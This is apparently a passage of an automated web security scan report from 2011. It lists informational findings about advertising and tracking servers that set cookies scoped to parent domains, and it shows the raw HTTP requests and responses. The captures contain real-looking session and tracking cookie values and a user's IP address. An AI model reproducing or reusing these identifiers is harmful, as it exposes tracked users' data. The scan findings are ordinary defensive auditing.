rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qnR8="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFC/qvI8UwNJUUXVf8UFXhKHlhtaTUsyteYavE/JCbILBh6e6fDPyLIUBVfPETsbapUReItzvgd4yBCIY+E81bY+HYOQ3Pa29yevZZMl3HBn6LQlyY6PJ+czZuXLZe06b5Mm+7Iv99PwLcTYhyG/rkEfRgo8ZzlmEWSabIWmExsmjaW872x+SfOUSN7hNLNcWrYCfkA4LhWl+W35+1oXAbuEcAt099ocpLqCeBuUa4NqIzvJ1QNyaif9nLJmXcZyxS9cTONiH3V0ZjJTiF72mjpLtgf4H90Hy/RyPGV7MWvrWcP675mv4O5RMCAsEJynKxutWJ9DlV8F5uhY4uCycogkYT+4CCUzwdMbEv9C2Szlac+IDVck263jdk3dT+zoGHYihNaIARzL3SCvGwlor6TRnGUuztCIN92HiEAUbxkj4Ecd2786JNnWbBSOmn03YIhl67iByEEk4+vZ3SORGuH7RohIA8zgHCdEYwFbIBGTm+m8T9qJ1T3zHOVrGATIL0BFGWF2hJ/6LRcbPPXEpsg1BWTLSB9ho8hlqcrViz+W92j2+tNFa6RgdOR62lOFE5QDsjdCoyi+e7zIFDDhlD6vz+3CLT4ABtDGVj9H1UDABGB1IiEvASmLjYsEnI9/3inbprhMgZEKeFyAA00nAcezbPVyc5aEhbffKYesm4nF7NH6kU6R//GWExLgUKPPUqlFqahhiTb9vbV4aky1/c9p3zoZzEpqEg1egxFhOGlK5bpioc8766Koy41haN7c4IgA0LL/YlgqiZiZ9ebb8RCR/Y6qiM4sltJIIFkkGr+XSltrQ/Kk4CRo1mKzqqOUND0t2yHpnWmhPC2BQm7PhmGrI2QI8vR7esqlmRnrVzgYkE32hjrd+IqJ3/Mo/y10tySvoTMQgg0Ld/xVhEpS6PyvMey0Liyk4vnPrbs9UYPpQ193dMvRYmmL4vdQiw7HU5cdjnLsrfiaHUzF+PXn5LPn1ALry8g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm+2LS9kU2pq84TPKMUJYsSamWvaRqum4ZlwD+htF/WzvYPxjEEfeOkBLjjASSNbdvlwBTARhFD0vnpnUQDltbU+8KNhj4BKp+e1bYJu0pA65zeD3CpncMlg3/+sBnm/l0R76TeTGfGgjCv4Gmxkxvdj7c//jOa/2OkQIQCV4QVSbydyGPpmFxiIJ8N0woA3MNzSiY/UNsOyDqN2JctqbLRk4te1Irfyk0AANpfdPXSGIl4Cn6dMSmHs+/LulphDiyap7cbEexsLxFDYERec+aXVc9NqVjSdqj2J52oP+vf8ps6Fn92hhEy0x9NzvpZ6r7il0NAFdwS2BPMxjmRJn3H+CJ4vcrAcDVyHfMXCuHbzuvIXbF1JM+W95OXHpJeFjcwDGWrnnP8M62BAMl0B2uHruFo5Njp4vPKqcGt1f38UxiG78X4lkyY5KXDlOf5o+y9AEZ2czhhLW7ZyMeijCBOO0TMqkkcgw6TVJxf9kEDMoC+jf+O+Qp6jWxBFUfthXK/MKeGkM7X+tGpYMjO5t+ZWCNPJXfyTsS1wXUuK/awFub5KSGKgkc3TqKE/u+DSZcxbwBRdbrWQ5zlxrV2RkrK5bhemyFTiBRETGlILJeVlV5RFYaWTei7+QatRZwO/f9sW2gs9MboAD1cQtX3bhLEYk4qGNqwEQH8O4bzAB2LiuMabs+SewYRooJfpioKDDHwltRP9+Vi0K5LeLy73fAtGIkh8Zx9wgZQRv42T+M8D2WJv7EtKesl6Ba/Y6R6rhmSZofOlZ38Bl948Koe0S8RslnhhySOuVM5idLnolA/QFAUSI5pXd1tlDD72wB9koAkjJWPUKeY33eeFkAWBQpIfoJAEfJiNKVq2Qd5wOORoDqK1np/WMNxWNZokGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GcpXhxh9CCs9YnWG+dWKnzNyBxrgIJBjBX3PhVDk1QsC03Vem3n9G4aK5lYQwB0igrRUIzMUcJJDyN8R725OilnRZ9tzO7iExbRQOmWqX6/mu0ROD8ZrIIc9xZIa2B2ogauEnlfGMynvUVzKeT/OVj/a3f7SpuFepHZk54HHUAV0L7jM7LPmEqRO9T7x6Li1pZW/pLlOjXX2mUfjTcUrsZVAvbD/H4N+SsJK+uDW/s44YejZsUOMJoVPGOQDuA2AflrD/McFWc+UX1OrMN/54pT13vLBmL/lqbyaefQLf85Nj/fK+WXTsMlmmEmarBG8cKviLscoTt0jVhHxz0+WvIHoOfpb4gc8J1BkQaXWIg5rpP4aAxjGv+KlAeoog0DHOyqEKNxjS0hebEQHc/qLxCBZUAvLH2iSQbXEU2F9DDeTrta8svKozVc312ryC4buT/M70irTlDi87j8J2N7nM+TRkjaaAkteNNCSxqWMDZFGGC5PIUnZqNzU6FpdFYzGhyFZCJ91zVZyA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:17:54 GMT

12.19. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13078&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUB0TYJEwPaU_7WDI3ccZVAq.0_foDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfA9bMTBwABPSTkYeRgaGwFuMfECKwYCbgZGZhYWflZGNkZ2Rg5GTkYuRG6xCwQxMLS0AK2TJZBQEqmcJYRJkFAIy5HdxsrBgagKnUWuQfQwMANDqkkE-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUinufEXt9HLZETnIErylkCGzd0C4DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7kuuwKymoEBAFhQk_g-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 01:01:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=99220&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:01:09 GMT

12.20. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1235633084&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Fproduct.do%253FbaseCode%253D93260%2526dataset%253D11309%26jsref%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ftemplate.do%253Fid%253Dtemplate3%2526page%253D2000%26rnd%3D1304903453531&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 01:18:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.21. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=99220&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXNzmEri$NP^zjJv16.uOiiIAJm'i/?`wtMan.OL7JR%9_Qi'sH?P8)dD_cwkfN=J6^G_S2VZyFVB)VG2Vw2thPTUbP<wWYepcQ?p3>xz(+n$Re8'MY-mhu#.Xt]9[@nN+Ds+7'8q_!*9MdOq3NdJdss.Hj'/sFJ<-+z3E0EE7j)M961RbGb1dj#L@[9dW/NyqWx!_x)fy):[Aa=QO!jG:eNKR)GNwxNn+ffW'EqWJgi1p9#uqJ2MdA<fq#d/OW8$mC<6O.FQ6^>L-!w71A$]900:P$P<mQfUC(KA9X.t8gFMHTn1=0S6u_D96a?e(y#41L9alTN8lk+phc8qcDDwI#ht*Ojk$^h/f:4!*=PA8ETumU6=Lq?'LZXd)U<toDTN:^atTHtT9bQ$L$A.Vxr9-Ty'Y$?/v<XcvtB4/?l*9vZEk.r)kLPE6cj7OE<Wt?Q*xbt7KIuF6C=Ld+zNWABEs>Sa5%-[[n4b1!c`; uuid2=2724386019227846218

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(B>?r>)Wh]!7Le!'.dm=2-d(cr<N=i9KW%L:e76g3o>[E)HRW4I=4+GL0pFiQYDG)SQTQQt=Wze7KMy4SLmU1$q`<%zkDtGTvv07wDD'4p1+]t1Fr=)hXH9UcMhc2vLyT<qvUI(RNJ##CCaO7zh)X!wr:OQg%hvnsVkA)_@wnpV2gTH9XdHO0+jZ^LHe:gGW[d%ucxR>`]wQJkiUJd*48d+/b^#=L>1gNc%^[j67VIBkl+:o9wPOnS_'N2cAs+2.D1i3Fw''=O2H7WbunxPoQy$tq(yXAKH74WPoNn(e:g`jCMSaJqvN)#uGkG#c3$GGXWx7.r5xI@[:bBBFR8=rbwMo5?kyXDAkUwc14=YBGq1Hht6P3N$$u8DSmGwX6Bw$_@QJ3nJ`HLp:*F)+8QtMHxNyN8Z5'Nn`jT7hw*[QA5DIt]`32Et8:-!?vdXp!80J?]?)H9j1h[/MvP_!<3In.eh6bzHRMEQTt*Z=Q:[_91O*l'*BcQd!(]!-Z2hIM*:wXf5+uWxmeZPL?8!=(+vsr]q[wwR0J`AN?]; path=/; expires=Sun, 07-Aug-2011 01:02:22 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?id=1186978&t=2
Date: Mon, 09 May 2011 01:02:22 GMT
Content-Length: 0

12.22. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&9174=734264; domain=.interclick.com; expires=Sun, 09-May-2021 01:04:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 01:04:51 GMT

GIF89a.............!.......,...........D..;
12.23. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=birthdaysmiles_cs=1&betq=12580=431215 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDc2NzUwMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=jsYxN5pqDIxFG+sovQg3sYIdSK8BItdxPfQ3WX8zHsY4F/8Bw3gxPfQ7NY8zHoLOG/8BKGexPfwmhX8zH8eDG/8BdDmxPfwohX8zHQY4F/8BYimxPfA3Wa8zHoa4F/8BA9qxPfgdeZ8zH4fFG/8BbTexPfwKOa8zHoN5F/8BC9qxPfwtZa8zHE0rG/8BFBqxPfQTaa8zHY4dG/8BNLqxPXrqEoxsGSXtrSQIzaEoRGABg2cBJbm5IaAqxOCBsRpxg2I9IsfzFA3i4SQBwWY0ltCqGkNseSw7Ra83VSPBrLqhRPJUEQT2F/NruTQAzZ830KHBbzqxfn6BE8sXG/NogVwrgYQZzWdBkoqhzO67FcNNGuekAbwuRXA1um/BEOphBMLUHsEpGyAq+fQoeZsEfO8BgwhR6U7/HUJtGgZZpTrBQHqFH09IG4co8ew5qY8zY6wBsMiRteAnjaUrHEv9F1aqGhQ9fZ8WFirZDugBoC; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 01:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=NzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: GUID=MTMwNDkwMjg2MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 01:01:01 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 02:01:01 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?[AQB]&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E39E5A851D2CAB-6000010360000EE4[CE]; Expires=Sat, 7 May 2016 01:00:37 GMT; Domain=.ftd.com; Path=/
